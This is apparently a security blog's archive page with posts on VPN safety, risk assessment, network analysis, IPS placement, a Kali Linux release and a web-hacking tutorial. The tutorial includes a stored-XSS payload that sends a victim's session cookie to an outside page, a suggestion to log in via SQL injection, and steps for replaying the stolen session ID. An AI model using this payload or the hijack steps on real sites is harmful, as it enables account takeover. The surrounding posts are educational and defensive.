Thursday, August 18, 2022

How safe is your VPN?


Well, the answer is... it depends!


You use a reliable VPN to make sure that you remain safe and secure while you browse the internet. When you don't want to be snooped on by government agencies or other companies, you use a VPN. When you want to access websites that have been blocked by your government, you use a VPN. When you don't want your ISP to track your online activities, you use a VPN.

**A VPN is a great tool, but it comes with a caveat.**

Not all VPNs are equal. For example, if you are using a free VPN, you might be compromising your security as well as your anonymity.
VPNs are used by individuals and by corporations alike; they create a private browsing session for each user.
Suppose you are travelling to a remote area and need to connect to your company's network. In that case, you might need to connect to public Wi-Fi first. But public Wi-Fi may let other users of that network eavesdrop on what you are doing online. You should certainly use a VPN in situations like this, because a VPN creates a secure tunnel between your computer or laptop and the VPN server, which hides all your online activities and your location too.

Indeed, a VPN allows you to protect your online privacy and prevents your ISP from tracking your online activities. All VPNs work by connecting your device to a VPN server and then routing your internet traffic through your VPN service provider's internet connection.

This process successfully hides your browsing information...

The very same process also prevents a MiTM attacker from gathering or monitoring your online activities.
___
👉 Private Browsing is NOT equal to VPNs.

Google Chrome offers an 'Incognito' mode, and Microsoft Edge and Firefox offer 'Private Browsing' modes. But you should not make the mistake of assuming that these modes are a replacement for a VPN.

These modes may prevent data from being stored on your local device or computer. They may not save your browsing history, for example. But that does not mean that no one can track you. Your ISP can still track you, and the vendors whose plugins run in such modes may also track your behavior.

On a side note, Opera does have an inbuilt 'VPN' feature.
___
👉 Why FREE VPNs may not be safe for you?

1. Free VPN tools can compromise your security.

You may not realize that if you are using a free VPN service, the application you use to connect to the VPN server may not be safe. It is quite possible that such apps contain malware. That malware could be used by cyber-attackers to steal your data, gain unauthorized access to your data or machine, or launch a malicious attack on your system. In 2016, a paper was published on the privacy and security issues of VPN tools for Android devices. The ICSI Network and Security Group found that as many as 283 Android VPN apps contained some form of malware presence. Many of these apps were also asking for far more permissions than they required.

The same can be true of all sorts of VPN applications... You need to be watchful here.

2. Free VPN tools track your online activity.

The same study found that 72% of free VPN services were using third-party tracking tools in their software. It means those third parties were collecting users' information and selling it to the highest bidders. The objective was to allow online advertisers to target those users with advertising.

A VPN is supposed to protect your activity while you are browsing the internet. But they were doing the opposite by tracking your online activities.

Some free VPN tools completely hide whether they share or sell user data, while other service providers may mention it in their privacy policies. Ironically, a normal user tends never to read those privacy policies.

3. Free VPN tools limit data usage too.

Let us take an example: you want to watch a movie on Netflix, but it is not available in your country or region because of some restriction. A VPN would let you do that. But free VPNs may place a cap or limit on the amount of data you can use through their tool. This limit can be daily or monthly. There may be other types of limitations too.

Thus, if you want to protect your data or mask your location for a considerable length of time, then Free VPNs are not for you.

4. Free VPNs slow down users’ internet speed.

They do. I have seen even paid VPN services succumb to slow internet speeds many a time. They slow the internet speed available to you because the ultimate objective is to push you to buy the paid version of the service.

5. Free VPN tools target users with ads.

These services need revenues to sustain their operations. If they cannot charge in case of FREE VPN, then they use direct advertising to boost their revenues. The ads are served to you, without even your permission. Ads not only slow down the internet speed further, they also can distract you from doing some productive work.

The presence of ads on a free VPN service is by default a privacy concern because it is likely the provider is sharing your online activity with third-party services.
___
👉👉 The Secure VPNs

Different vendors have different parameters for delivering security to you.
If a VPN provider is ensuring your online privacy, providing transparent privacy policies, fixing data-leaks, and not tracking its users, then you can say that it is a 'safe' VPN.

The whole idea of a VPN is to hide or disguise your IP address. But sometimes software bugs or coding errors introduce flaws that result in leaking your IP address or location. That's why, when you check customers' online reviews, you should look for any history of IP-address leakage: whether it happened, when, how, and how it was stopped.

There should be ZERO logging by the VPN. It should not collect or log any data you or other users share over such networks. It should not log any login credentials, files you have downloaded, websites you visited, or your search queries. This is essential to maintain your anonymity. You don't want your VPN tools to have any ability to record or store such information, even on your computer. If they do, a malicious attacker can compromise the application and take out all the information before it is purged.

You should activate the Multi-factor Authentication (MFA) feature of these VPN applications. This extra security feature is mandatory in these times of cyber-crime.
When a malfunction happens, a device using the VPN typically goes back to using its default internet connection. This happens automatically. Worse, it usually happens without you being aware, and your IP address gets leaked within a few seconds.

That's why you should check that your VPN application has a VPN kill switch. This feature is important because it automatically exits specific programs that were using the VPN internet connection. It comes in very handy when your VPN connection drops for any reason. Most VPN services include one as part of the client application. When it detects a problem, the kill switch triggers and stops all of your device's traffic from reaching the internet. It effectively kills your connection.
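The fallback to the default connection described above can be checked from a routing table. The following is an added example, not code from any VPN product: it models longest-prefix routing over two constructed `ip route` listings and reports where traffic would go once the tunnel interface disappears. The interface names (`tun0`, `wlan0`) and all addresses are assumptions.

```python
import ipaddress

# Constructed `ip route` output: the VPN client added two /1 routes over tun0
# and left the original default route via the Wi-Fi interface in place.
SPLIT_DEFAULT_TABLE = """\
default via 192.168.1.1 dev wlan0 proto dhcp metric 600
0.0.0.0/1 via 10.8.0.1 dev tun0
128.0.0.0/1 via 10.8.0.1 dev tun0
10.8.0.0/24 dev tun0 proto kernel scope link src 10.8.0.2
192.168.1.0/24 dev wlan0 proto kernel scope link src 192.168.1.50
203.0.113.10 via 192.168.1.1 dev wlan0
"""

# Constructed table for a fail-closed setup: the physical interface only
# carries the LAN and the route to the VPN server itself.
FAIL_CLOSED_TABLE = """\
default via 10.8.0.1 dev tun0
10.8.0.0/24 dev tun0 proto kernel scope link src 10.8.0.2
192.168.1.0/24 dev wlan0 proto kernel scope link src 192.168.1.50
203.0.113.10 via 192.168.1.1 dev wlan0
"""


def parse_routes(text):
    """Return (network, device) pairs from `ip route`-style lines."""
    routes = []
    for line in text.splitlines():
        fields = line.split()
        if "dev" not in fields or fields.index("dev") + 1 >= len(fields):
            continue
        dest = "0.0.0.0/0" if fields[0] == "default" else fields[0]
        try:
            network = ipaddress.ip_network(dest, strict=False)
        except ValueError:
            continue  # route types such as "unreachable" are ignored here
        routes.append((network, fields[fields.index("dev") + 1]))
    return routes


def egress_device(routes, destination):
    """Longest-prefix match: the interface the kernel would pick, or None."""
    addr = ipaddress.ip_address(destination)
    matches = [(net.prefixlen, dev) for net, dev in routes if addr in net]
    if not matches:
        return None
    return max(matches, key=lambda m: m[0])[1]


def check_tunnel_drop(route_text, destination, tunnel="tun0"):
    """Compare the egress interface with the tunnel up and after it drops."""
    routes = parse_routes(route_text)
    while_up = egress_device(routes, destination)
    # When the tunnel interface goes away, every route bound to it goes too.
    survivors = [(net, dev) for net, dev in routes if dev != tunnel]
    after_drop = egress_device(survivors, destination)
    return {
        "while_up": while_up,
        "after_drop": after_drop,
        "leaks": after_drop is not None,  # traffic still has a way out
    }


if __name__ == "__main__":
    for name, table in (("split default", SPLIT_DEFAULT_TABLE),
                        ("fail closed", FAIL_CLOSED_TABLE)):
        print(name, check_tunnel_drop(table, "198.51.100.7"))
```

In the first table the real IP address is exposed as soon as the tunnel drops; in the second there is simply no route left, which is the behaviour a kill switch enforces.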

A VPN from a reliable & trustworthy service-provider should encrypt your data and online browsing history to shield them from hackers and ISPs.

Paid-versions of VPNs usually include ad-blocking tools, as well as features like malware protection and unlimited bandwidth, which keep your data secure.

Why is cyber security risk assessment so important?

 


A cyber security risk assessment is the process of identifying, analysing and evaluating risk. It helps to ensure that the cyber security controls you choose are appropriate to the risks your organisation faces.

Risk assessment is a process that includes:

* Identifying vulnerabilities, threats, and risks that can cause any sort of damage to the organization
* Estimating the probability of risks being realized
* Defining mitigation priorities by risk severity and the likelihood of occurrence

In risk management, assessment is preceded by framing (establishing the context of risks) and followed by responding to and monitoring these risks.

Without a risk assessment to inform your cyber security choices, you could waste time, effort and resources. There is little point implementing measures to defend against events that are unlikely to occur or won’t impact your organisation.

Likewise, you might underestimate or overlook risks that could cause significant damage. This is why so many best-practice frameworks, standards and laws – including the GDPR (General Data Protection Regulation) and DPA (Data Protection Act) 2018 – require risk assessments to be conducted.

Please understand very clearly that it is an ongoing process that helps you evaluate your security controls, detect issues, and estimate their impact.

5 Major Reasons for Conducting a Cyber/IT Risk Assessment:

1. To prevent hacks, data breaches, and data loss. A periodic review of cybersecurity controls allows you to detect and close off vulnerabilities before hackers can exploit them.

2. To examine network security. An independent risk assessment provides an unbiased examination of your network’s security controls. It helps you update knowledge on your protected environment, especially after significant changes like deploying new software, installing new hardware, or moving to a new location.

3. To improve decision-making. Determining the impact of discovered risks is an important part of a risk assessment. This information is useful for making further decisions related to cybersecurity: budgeting, planning improvements, prioritizing fixes, etc.

4. To reduce spending on cybersecurity. An assessment is a time- and cost-consuming procedure. But in the long term, it can save you from more severe losses by preventing data breaches, hacks, and compliance violations.

5. To ensure compliance. Risk management is part of many laws, regulations, and standards including NIST Special Publications, HIPAA, PCI DSS, and GDPR. Failing to comply with those that are relevant to your business may lead to substantial fines.


A REVIEW CHECKLIST FOR NETWORK SECURITY ANALYSIS


 

All network analyzers/sniffers can capture data from the network. But most of them only compute some simple statistics and then throw pages of numbers at the user. Especially in a big network with heavy traffic, network administrators are still left to figure out a network problem themselves, even a simple one.

The Security Analysis is a perfect example. The Security Analysis is an analysis profile which has the power to detect the following network anomalies and attacks:

* ARP attack
* Worm activity
* DoS attack
* TCP port scanning
* Suspicious conversation

Review a Checklist of Analysis Tasks

There are a large number of tasks which a Security Analyst should perform. These tasks can be considered proactive or reactive.
Proactive methods include BASELINING network communications to learn the current status of the network and application performance. It can also be used to spot network problems before they are felt by the network users.

For example, identifying the cause of packet loss before it becomes excessive and affects network communications helps avoid problems before they are even noticed.

Reactive analysis techniques are employed after a complaint about network performance has been reported or when network issues are suspected. Sadly, reactive analysis is more common.
The following lists some of the analysis tasks that can be performed using Wireshark:

* Find the top talkers on the network
* Identify the protocols and applications in use
* Determine the average packets per second rate and bytes per second rate of an application or all network traffic on a link
* List all hosts communicating
* Learn the packet lengths used by a data transfer application
* Recognize the most common connection problems
* Spot delays between client requests due to slow processing
* Locate misconfigured hosts
* Detect network or host congestion that is slowing down file transfers
* Identify asynchronous traffic prioritization
* Graph HTTP flows to examine website referrals rates
* Identify unusual scanning traffic on the network
* Quickly identify HTTP error responses indicating client and server problems
* Quickly identify VoIP error responses indicating client, server or global errors
* Build graphs to compare traffic behavior
* Graph application throughput and compare to overall link traffic seen
* Identify applications that do not encrypt traffic
* Play back VoIP conversations to hear the effects of various network problems on network traffic
* Perform passive operating system and application use detection
* Spot unusual protocols and unrecognized port number usage on the network
* Examine the startup process of hosts and applications on the network
* Identify average and unacceptable service response times (SRT)
* Graph intervals of periodic packet generation applications or protocols

Networks vary greatly in the traffic seen. The number and type of network analysis tasks you can perform depends on your network traffic characteristics.
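Two of the tasks above, finding the top talkers and identifying unusual scanning traffic, can be expressed as simple logic over a capture summary. This is an added example, not Wireshark's or any analyzer's own code; the column layout (time, source, destination, destination port, TCP flags, frame length), the addresses and the thresholds are all assumptions, and the rows are constructed.

```python
import csv
import io
from collections import Counter, defaultdict

# Constructed capture summary rows: one HTTPS client, one host opening two
# services, and one host sending bare SYNs to 25 ports within a quarter second.
NORMAL_ROWS = """\
0.00,10.0.0.21,10.0.0.5,443,SYN,74
0.01,10.0.0.5,10.0.0.21,51544,SYN-ACK,74
0.02,10.0.0.21,10.0.0.5,443,ACK,66
0.05,10.0.0.21,10.0.0.5,443,PSH-ACK,1514
0.06,10.0.0.21,10.0.0.5,443,PSH-ACK,1514
0.07,10.0.0.5,10.0.0.21,51544,ACK,66
2.50,10.0.0.30,10.0.0.5,80,SYN,74
2.60,10.0.0.30,10.0.0.5,22,SYN,74
"""
SCAN_ROWS = "".join(
    f"{1 + i * 0.01:.2f},10.0.0.66,10.0.0.5,{20 + i},SYN,60\n" for i in range(25)
)
SAMPLE = NORMAL_ROWS + SCAN_ROWS


def load_rows(text):
    """Parse the summary into dictionaries with typed fields."""
    rows = []
    for time, src, dst, dport, flags, length in csv.reader(io.StringIO(text)):
        rows.append({"time": float(time), "src": src, "dst": dst,
                     "dport": int(dport), "flags": flags, "length": int(length)})
    return rows


def top_talkers(rows, n=3):
    """Sources ranked by total bytes sent."""
    sent = Counter()
    for row in rows:
        sent[row["src"]] += row["length"]
    return sent.most_common(n)


def find_port_scans(rows, min_ports=15, window=5.0):
    """Flag source/destination pairs where bare SYNs reach many distinct
    ports inside a sliding time window."""
    syns = defaultdict(list)
    for row in rows:
        if row["flags"] == "SYN":
            syns[(row["src"], row["dst"])].append((row["time"], row["dport"]))

    findings = []
    for (src, dst), events in syns.items():
        events.sort()
        in_window = Counter()   # port -> SYN count currently inside the window
        start = 0
        peak = 0
        for time, port in events:
            in_window[port] += 1
            # Drop events that have fallen out of the window.
            while time - events[start][0] > window:
                old_port = events[start][1]
                in_window[old_port] -= 1
                if in_window[old_port] == 0:
                    del in_window[old_port]
                start += 1
            peak = max(peak, len(in_window))
        if peak >= min_ports:
            findings.append({"src": src, "dst": dst, "ports": peak})
    return findings


if __name__ == "__main__":
    records = load_rows(SAMPLE)
    print("top talkers:", top_talkers(records, 2))
    print("possible scans:", find_port_scans(records))
```

The scanning host sends little data and never appears first among the top talkers, which is why byte counts alone do not surface it.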

Deploying Sensors for Intrusion Prevention Systems (IPS)

 


Today, I am sharing the crux of that discussion with you…
Technical factors to consider when selecting sensors for deployment in an organization include the following:

* The network media in use
* The performance of the sensor
* The overall network design
* The IPS design (Will the sensor analyze and protect many systems or just a few?)
* Virtualization (Will multiple virtual sensors be created in the sensor?)

Important issues to keep in mind in an IPS design include the following:

1. Your network topology:
Size and complexity, connections, and the amount and type of traffic.

2. Sensor placement:
It is recommended that these be placed at those entry and exit points that provide sufficient IPS coverage.

3. Your management and monitoring options:
The number of sensors often dictates the level of management you need.

Locations that generally need to be protected include the following:

* Internet: Sensor between your perimeter gateway and the Internet
* Extranet: Between your network and extranet connection
* Internal: Between internal data centers
* Remote access: Hardens perimeter control
* Server farm: Network IPS at the perimeter and host IPS on the servers


Please let me know what you think about this in the comment section. You can also share it with others if the information here helps you in some manner.

TYPES OF CYBER ATTACKS

 


* Malware: Software programs designed to damage or do unwanted actions on a computer. Common examples include viruses, worms, trojan horses, spyware, and ransomware.
* Phishing: Attacks sent via email that ask users to click on a link and enter their personal data. They include a link that directs the user to a dummy site that will steal the user's information.
* Password Attacks: Involve a third party trying to gain access to your systems by cracking a user's password.
* Denial of Service Attacks (DoS or DDoS): Attackers send high volumes of data or traffic through the network until the network becomes overloaded and can no longer function.
* Man in the Middle (MITM): Information is obtained from the end user and the entity the user is communicating with by impersonating the endpoints in an online information exchange (i.e. connection from smartphone to website).
* Drive-by Downloads: A program is downloaded to a user's system just by visiting the site. It doesn't require any type of action by the user to download.
* Malvertising: Malvertising ("malicious advertising") is the use of online advertising to spread malware. It typically involves injecting malicious or malware-laden advertisements into legitimate online advertising networks and webpages.
* Rogue Software: Rogue security software is a form of malicious software and internet fraud that misleads users into believing there is a virus on their computer and aims to convince them to pay for a fake malware removal tool that actually installs malware on their computer. It is a form of scareware that manipulates users through fear, and a form of ransomware.

Saturday, August 13, 2022

Kali Linux 2022.3 – Added Bruteshark And Test Lab Environment

 


Offensive Security has released Kali Linux 2022.3 with major updates.

It is a popular platform for ethical hackers and penetration testers, and an operating system for identifying vulnerabilities within a network.

Previously, 10 tools were added in Kali Linux 2022.2.

Kali’s 2022.3’s Release Highlights:

  • Discord Server – Kali’s new community real-time chat option has launched!
  • Test Lab Environment – Quickly create a test bed to learn, practice, and benchmark tools and compare their results
  • Opening Kali-Tools Repo – We have opened up the Kali tools repository and are accepting your submissions!
  • Help Wanted – We are looking for a Go developer to help us on an open-source project
  • Kali NetHunter Updates – New releases in our NetHunter store
  • Virtual Machines Updates – New VirtualBox image format, weekly images, and build-scripts to build your own

Other Kali updates

  • For people who use Xrdp (like Win-KeX), there is a new look to the login
  • Fixed up some confusion between fuse and fuse3
  • Some maintenance to our network repository, and shrank /kali from 1.7Tb to 520Gb!

New Tools Added –

Kali Linux would not be a release without some new tools!

A quick run down of what has been added (to the network repositories):

  • BruteShark – Network Analysis Tool
  • DefectDojo – Open-source application vulnerability correlation and security orchestration tool
  • phpsploit – Stealth post-exploitation framework
  • shellfire – Exploiting LFI/RFI and command injection vulnerabilities
  • SprayingToolkit – Password spraying attacks against Lync/S4B, OWA and O365

There have been numerous packages updates as well.

Kali NetHunter Updates

Full Android 12 support is getting closer to being a reality with 6 new kernels in our NetHunter repository and updates to the NetHunter app.

It is still not for the fainthearted as a little tinkering is required to install all the components individually but we’re getting closer to releasing the first OnePlus image soon.

For the meantime, we have updated the apps in our NetHunter Store to the latest releases, including:

  • aRDP, aSPICE, bVNC, Opaque = v5.1.0
  • Connectbot = 1.9.8-oss
  • Intercepter-NG = 2.8
  • OONI Probe = 3.7.0
  • OpenVPN = 0.7.38
  • Orbot = 16.4.1-RC-2-tor.0.4.4.6
  • SnoopSnitch = 2.0.12-nbc
  • Termux = 118
  • Termux-API = 51
  • Termux-Styling = 29
  • Termux-Tasker = 6
  • Termux-Widget = 13
  • Termux-Float = 15
  • WiGLE WiFi Wardriving = 2.64

If you would like to get involved and help out with the development, or just like to chat to like-minded Android tinkerers, why don’t you join us in the NetHunter channels on our new Discord server? We’d love to see you around!

Existing Installs:

If you already have an existing Kali Linux installation, remember you can always do a quick update:

┌──(kali㉿kali)-[~]
└─$ echo "deb http://http.kali.org/kali kali-rolling main non-free contrib" | sudo tee /etc/apt/sources.list

┌──(kali㉿kali)-[~]
└─$ sudo apt update && sudo apt -y full-upgrade

┌──(kali㉿kali)-[~]
└─$ cp -rbi /etc/skel/. ~

┌──(kali㉿kali)-[~]
└─$ [ -f /var/run/reboot-required ] && sudo reboot -f

You should now be on Kali Linux 2022.3. We can do a quick check by doing:

┌──(kali㉿kali)-[~]
└─$ grep VERSION /etc/os-release
VERSION="2022.3"
VERSION_ID="2022.3"
VERSION_CODENAME="kali-rolling"

┌──(kali㉿kali)-[~]
└─$ uname -v
#1 SMP PREEMPT_DYNAMIC Debian 5.18.5-1kali6 (2022-07-07)

┌──(kali㉿kali)-[~]
└─$ uname -r
5.18.0-kali5-amd64

NOTE: The output of uname -r may be different depending on the system.

Kali Linux 2022.3 Download


Thursday, June 30, 2022

How to Hack a Website: Hacking Websites Online Example

More people have access to the internet than ever before. This has prompted many organizations to develop web-based applications that users can use online to interact with the organization. Poorly written code for web applications can be exploited to gain unauthorized access to sensitive data and web servers. In this tutorial you will learn how to hack websites, and we will introduce you to web application hacking techniques and the counter measures you can put in place to protect against such attacks.

What is a web application? What are Web Threats?

A web application (aka website) is an application based on the client-server model. The server provides the database access and the business logic. It is hosted on a web server. The client application runs on the client web browser. Web applications are usually written in languages such as Java, C#, VB.Net, PHP, ColdFusion Markup Language, etc. The database engines used in web applications include MySQL, MS SQL Server, PostgreSQL, SQLite, etc.

Most web applications are hosted on public servers accessible via the Internet. This makes them vulnerable to attacks due to easy accessibility. The following are common web application threats.


  • SQL Injection – the goal of this threat could be to bypass login algorithms, sabotage the data, etc.
  • Denial of Service Attacks – the goal of this threat could be to deny legitimate users access to the resource.
  • Cross Site Scripting (XSS) – the goal of this threat could be to inject code that can be executed on the client-side browser.
  • Cookie/Session Poisoning – the goal of this threat is for an attacker to modify cookies/session data to gain unauthorized access.
  • Form Tampering – the goal of this threat is to modify form data such as prices in e-commerce applications so that the attacker can get items at reduced prices.
  • Code Injection – the goal of this threat is to inject code such as PHP, Python, etc. that can be executed on the server. The code can install backdoors, reveal sensitive information, etc.
  • Defacement – the goal of this threat is to modify the page being displayed on a website and redirect all page requests to a single page that contains the attacker's message.

How to protect your Website against hacks?

An organization can adopt the following policy to protect itself against web server attacks.

  • SQL Injection – sanitizing and validating user parameters before submitting them to the database for processing can help reduce the chances of being attacked via SQL Injection. Database engines such as MS SQL Server, MySQL, etc. support parameters and prepared statements. They are much safer than traditional SQL statements.
  • Denial of Service Attacks – firewalls can be used to drop traffic from suspicious IP addresses if the attack is a simple DoS. Proper configuration of networks and an Intrusion Detection System can also help reduce the chances of a DoS attack being successful.
  • Cross Site Scripting – validating and sanitizing headers, parameters passed via the URL, form parameters and hidden values can help reduce XSS attacks.
  • Cookie/Session Poisoning – this can be prevented by encrypting the contents of the cookies, timing out the cookies after some time, and associating the cookies with the client IP address that was used to create them.
  • Form Tampering – this can be prevented by validating and verifying the user input before processing it.
  • Code Injection – this can be prevented by treating all parameters as data rather than executable code. Sanitization and validation can be used to implement this.
  • Defacement – a good web application development security policy should ensure that it seals the commonly used vulnerabilities to access the web server. This can be a proper configuration of the operating system, web server software, and best security practices when developing web applications.
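The SQL Injection, Cross Site Scripting and Form Tampering countermeasures above can be layered on a single form field. This is an added example, not code from the tutorial's application: it takes a contact's first name through validation, a parameterized insert and output escaping, with the concatenated insert shown beside it for contrast. The table layout, the allowed-character rule and the sample values are assumptions.

```python
import html
import re
import sqlite3

# Constructed sample values: a legitimate name containing a quote, and a
# value carrying markup with an event handler.
QUOTED_NAME = "O'Brien"
MARKUP_NAME = '<a href=# onclick="/* handler */">Dark</a>'

# Assumed rule: letters, spaces, apostrophes, dots and hyphens, 1-50 chars.
FIRST_NAME_RE = re.compile(r"(?:[^\W\d_]|[ '.\-]){1,50}")


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE contacts (first_name TEXT NOT NULL)")
    return db


def validate_first_name(name):
    """Layer 1: reject input that does not look like a name at all."""
    return bool(FIRST_NAME_RE.fullmatch(name))


def save_contact_concatenated(db, name):
    """Weak pattern: the input becomes part of the SQL text, so a quote in
    the data changes the structure of the statement."""
    db.execute("INSERT INTO contacts (first_name) VALUES ('" + name + "')")


def save_contact_parameterized(db, name):
    """Layer 2: the statement is fixed; the input is bound as a value."""
    db.execute("INSERT INTO contacts (first_name) VALUES (?)", (name,))


def list_contacts(db):
    return [row[0] for row in db.execute("SELECT first_name FROM contacts")]


def render_contact_row(name):
    """Layer 3: escape on output so stored text is displayed, not executed."""
    return "<td>" + html.escape(name, quote=True) + "</td>"


if __name__ == "__main__":
    db = make_db()
    print("valid name:", validate_first_name(QUOTED_NAME))
    print("markup accepted:", validate_first_name(MARKUP_NAME))
    save_contact_parameterized(db, QUOTED_NAME)
    try:
        save_contact_concatenated(db, QUOTED_NAME)
    except sqlite3.OperationalError as exc:
        print("concatenated insert failed:", exc)
    # Even if validation were skipped, the stored value renders as text.
    save_contact_parameterized(db, MARKUP_NAME)
    for stored in list_contacts(db):
        print(render_contact_row(stored))
```

Escaping belongs at output time even when validation is in place, because data can reach the database through other paths than this form.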

Website hacking tricks: Hack a Website online

In this website hacking practical scenario, we are going to hijack the user session of the web application located at www.techpanda.org. We will use cross site scripting to read the cookie session id then use it to impersonate a legitimate user session.

The assumption made is that the attacker has access to the web application and he would like to hijack the sessions of other users that use the same application. The goal of this attack could be to gain admin access to the web application assuming the attacker’s access account is a limited one.


Getting started

  • Open http://www.techpanda.org/
  • For practice purposes, it is strongly recommended to gain access using SQL Injection. Refer to this article for more information on how to do that.
  • The login email is admin@google.com, the password is Password2010
  • If you have logged in successfully, then you will get the following dashboard



  • Click on Add New Contact
  • Enter the following as the first name

<a href=# onclick=\”document.location=\’http://techpanda.org/snatch_sess_id.php?c=\’+escape\(document.cookie\)\;\”>Dark</a>

HERE,

The above code uses JavaScript. It adds a hyperlink with an onclick event. When the unsuspecting user clicks the link, the event retrieves the PHP cookie session ID and sends it to the snatch_sess_id.php page together with the session id in the URL.




  • Enter the remaining details as shown below
  • Click on Save Changes





  • Your dashboard will now look like the following screen




  • Since the cross site script code is stored in the database, it will be loaded every time users with access rights log in
  • Let's suppose the administrator logs in and clicks on the hyperlink that says Dark
  • He/she will get the window with the session id showing in the URL



Note: the script could be sending the value to some remote server where the PHPSESSID is stored then the user redirected back to the website as if nothing happened.

Note: the value you get may be different from the one in this webpage hacking tutorial, but the concept is the same


Session Impersonation using Firefox and Tamper Data add-on

The flowchart below shows the steps that you must take to complete this exercise.


  • You will need Firefox web browser for this section and Tamper Data add-on
  • Open Firefox and install the add-on as shown in the diagrams below


  • Search for tamper data then click on install as shown above



  • Click on Accept and Install…


  • Click on Restart now when the installation completes
  • Enable the menu bar in Firefox if it is not shown


  • Click on tools menu then select Tamper Data as shown below



  • You will get the following window. Note: If the window is not empty, hit the clear button



  • Click on Start Tamper menu
  • Switch back to Firefox web browser, type http://www.techpanda.org/dashboard.php then press the enter key to load the page
  • You will get the following pop up from Tamper Data



  • The pop-up window has three (3) options. The Tamper option allows you to modify the HTTP header information before it is submitted to the server.
  • Click on it
  • You will get the following window



  • Copy the PHP session ID you copied from the attack URL and paste it after the equal sign. Your value should now look like this

PHPSESSID=2DVLTIPP2N8LDBN11B2RA76LM2

  • Click on OK button
  • You will get the Tamper data popup window again




  • Uncheck the checkbox that asks Continue Tampering?
  • Click on submit button when done
  • You should be able to see the dashboard as shown below




Note: we did not log in; we impersonated a login session using the PHPSESSID value we retrieved using cross site scripting.
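The impersonation above works because the server accepts the session ID from any client that presents it. This is an added example, not part of the original tutorial or its application: a server-side session check that applies the earlier Cookie/Session Poisoning countermeasures (idle timeout, binding to the client IP address) and issues the cookie with the HttpOnly attribute so page scripts cannot read it. The class, function names, timeout and addresses are assumptions.

```python
import secrets
from http.cookies import SimpleCookie


class SessionStore:
    """In-memory session table keyed by session ID."""

    def __init__(self, idle_timeout=900):
        self.idle_timeout = idle_timeout  # seconds of allowed inactivity
        self._sessions = {}

    def create(self, client_ip, now):
        """Issue an unguessable ID and remember which address it belongs to."""
        sid = secrets.token_urlsafe(32)
        self._sessions[sid] = {"ip": client_ip, "last_seen": now}
        return sid

    def validate(self, sid, client_ip, now):
        """Return 'ok', 'unknown', 'expired' or 'ip-mismatch'."""
        session = self._sessions.get(sid)
        if session is None:
            return "unknown"
        if now - session["last_seen"] > self.idle_timeout:
            del self._sessions[sid]
            return "expired"
        if session["ip"] != client_ip:
            # The ID is being presented from another address: treat it as
            # stolen and revoke it, so the legitimate user must log in again.
            del self._sessions[sid]
            return "ip-mismatch"
        session["last_seen"] = now
        return "ok"


def session_cookie_header(sid):
    """Build the Set-Cookie value with attributes that limit exposure."""
    cookie = SimpleCookie()
    cookie["PHPSESSID"] = sid
    cookie["PHPSESSID"]["path"] = "/"
    cookie["PHPSESSID"]["httponly"] = True    # not readable via document.cookie
    cookie["PHPSESSID"]["secure"] = True      # only sent over HTTPS
    cookie["PHPSESSID"]["samesite"] = "Strict"
    return cookie["PHPSESSID"].OutputString()


if __name__ == "__main__":
    store = SessionStore(idle_timeout=900)
    # Constructed timeline: login, normal use, then the same ID replayed
    # from a different address.
    sid = store.create("192.0.2.10", now=1000)
    print(session_cookie_header(sid))
    print(store.validate(sid, "192.0.2.10", now=1100))
    print(store.validate(sid, "198.51.100.99", now=1200))
    print(store.validate(sid, "192.0.2.10", now=1300))
```

Binding to the IP address can log out users whose address changes mid-session, so some applications apply it only to privileged accounts.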

Summary

  • A web application is based on the server-client model. The client side uses the web browser to access the resources on the server.
  • Web applications are usually accessible over the internet. This makes them vulnerable to attacks.
  • Web application threats include SQL Injection, Code Injection, XSS, Defacement, Cookie poisoning, etc.
  • A good security policy when developing web applications can help make them secure.


Evil Twin attack

An Evil Twin attack is frequently carried out against wireless access points with malicious intentions. This attack happens when...